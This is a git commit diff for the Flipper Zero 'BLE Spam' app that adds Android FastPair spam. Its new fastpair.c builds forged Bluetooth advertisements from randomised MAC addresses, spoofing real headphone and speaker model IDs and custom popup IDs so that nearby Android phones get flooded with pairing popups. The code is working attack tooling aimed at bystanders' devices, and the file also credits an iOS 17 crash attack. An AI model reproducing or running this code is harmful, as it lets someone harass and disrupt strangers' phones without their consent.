BLE Spam add Android FastPair spam

Co-authored-by: Spooks <62370103+Spooks4576@users.noreply.github.com>
2026-05-13 02:58:36 -07:00 · 2023-10-15 18:53:31 +01:00
parent 0465f3ca31
commit 74c3ab88d9
7 changed files with 103 additions and 3 deletions
--- a/applications/external/ble_spam/application.fam
+++ b/applications/external/ble_spam/application.fam
@@ -6,7 +6,7 @@ App(
    stack_size=4 * 1024,
    fap_icon="ble_spam_10px.png",
    fap_category="Bluetooth",
-    fap_author="@Willy-JL & @ECTO-1A",
+    fap_author="@Willy-JL @ECTO-1A @Spooks4576",
    fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam",
    fap_version="2.0",
    fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications",
--- a/applications/external/ble_spam/ble_spam.c
+++ b/applications/external/ble_spam/ble_spam.c
@@ -7,7 +7,8 @@
 // Hacked together by @Willy-JL
 // Custom adv API by @Willy-JL (idea by @xMasterX)
 // iOS 17 Crash by @ECTO-1A
-// Research on behaviors and parameters by @Willy-JL and @ECTO-1A
+// Android Pairs by @Spooks4576 and @ECTO-1A
+// Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576
 // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam

 typedef struct {
@@ -84,6 +85,19 @@ static Attack attacks[] = {
                    },
            },
    },
+    {
+        .title = "Android Device Pair",
+        .text = "~15min cooldown, long range",
+        .payload =
+            {
+                .random_mac = true,
+                .protocol = &ble_spam_protocol_fastpair,
+                .msg =
+                    {
+                        .fastpair = {},
+                    },
+            },
+    },
 };

 #define ATTACK_COUNT ((signed)COUNT_OF(attacks))
@@ -242,7 +256,7 @@ static void draw_callback(Canvas* canvas, void* ctx) {
            AlignTop,
            "App+Spam: \e#WillyJL\e# XFW\n"
            "Apple+Crash: \e#ECTO-1A\e#\n"
-            "\n"
+            "Android: \e#Spooks4576\e#\n"
            "                                   Version \e#2.0\e#",
            false);
        break;
--- a/applications/external/ble_spam/icons/android.png
+++ b/applications/external/ble_spam/icons/android.png
--- a/applications/external/ble_spam/protocols/_registry.c
+++ b/applications/external/ble_spam/protocols/_registry.c
@@ -2,6 +2,7 @@

 const BleSpamProtocol* ble_spam_protocols[] = {
    &ble_spam_protocol_continuity,
+    &ble_spam_protocol_fastpair,
 };

 const size_t ble_spam_protocols_count = COUNT_OF(ble_spam_protocols);
--- a/applications/external/ble_spam/protocols/_registry.h
+++ b/applications/external/ble_spam/protocols/_registry.h
@@ -1,9 +1,11 @@
 #pragma once

 #include "continuity.h"
+#include "fastpair.h"

 union BleSpamMsg {
    ContinuityMsg continuity;
+    FastpairMsg fastpair;
 };

 extern const BleSpamProtocol* ble_spam_protocols[];
--- a/applications/external/ble_spam/protocols/fastpair.c
+++ b/applications/external/ble_spam/protocols/fastpair.c
@@ -0,0 +1,72 @@
+#include "fastpair.h"
+#include "_registry.h"
+
+// Hacked together by @Willy-JL and @Spooks4576
+// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
+
+const char* fastpair_get_name(const BleSpamMsg* _msg) {
+    const FastpairMsg* msg = &_msg->fastpair;
+    UNUSED(msg);
+    return "FastPair";
+}
+
+void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) {
+    const FastpairMsg* msg = _msg ? &_msg->fastpair : NULL;
+
+    uint32_t model_id;
+    if(msg && msg->model_id != 0x000000) {
+        model_id = msg->model_id;
+    } else {
+        const uint32_t models[] = {
+            // Genuine devices
+            0xCD8256, // Bose NC 700
+            0xF52494, // JBL Buds Pro
+            0x718FA4, // JBL Live 300TWS
+            0x821F66, // JBL Flip 6
+            0x92BBBD, // Pixel Buds
+
+            // Custom debug popups
+            0xAA1FE1, // ClownMaster
+            0xAA187F, // VBucks
+            0xF38C02, // Boykisser
+            0x1448C9, // BLM
+            0xD5AB33, // Xtreme
+            0x13B39D, // Talking Sasquach
+        };
+        model_id = models[rand() % COUNT_OF(models)];
+    }
+
+    uint8_t size = 17;
+    uint8_t* packet = malloc(size);
+    uint8_t i = 0;
+
+    packet[i++] = 2; // Size
+    packet[i++] = 0x01; // AD Type (Flags)
+    packet[i++] = 0x02 + (0x04 * (rand() % 2)); // GENERAL_DISC_MODE + maybe BR_EDR_NOT_SUPPORTED
+
+    packet[i++] = 3; // Size
+    packet[i++] = 0x03; // AD Type (Service UUID List)
+    packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
+    packet[i++] = 0xFE; // ...
+
+    packet[i++] = 6; // Size
+    packet[i++] = 0x16; // AD Type (Service Data)
+    packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
+    packet[i++] = 0xFE; // ...
+    packet[i++] = (model_id >> 0x10) & 0xFF; // Model ID
+    packet[i++] = (model_id >> 0x08) & 0xFF; // ...
+    packet[i++] = (model_id >> 0x00) & 0xFF; // ...
+
+    packet[i++] = 2; // Size
+    packet[i++] = 0x0A; // AD Type (Tx Power Level)
+    packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm
+
+    *out_size = size;
+    *out_packet = packet;
+}
+
+const BleSpamProtocol ble_spam_protocol_fastpair = {
+    .icon = &I_android,
+    .get_name = fastpair_get_name,
+    .make_packet = fastpair_make_packet,
+};
--- a/applications/external/ble_spam/protocols/fastpair.h
+++ b/applications/external/ble_spam/protocols/fastpair.h
@@ -0,0 +1,11 @@
+#pragma once
+#include "_base.h"
+
+// Hacked together by @Willy-JL and @Spooks4576
+// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
+
+typedef struct {
+    uint32_t model_id;
+} FastpairMsg;
+
+extern const BleSpamProtocol ble_spam_protocol_fastpair;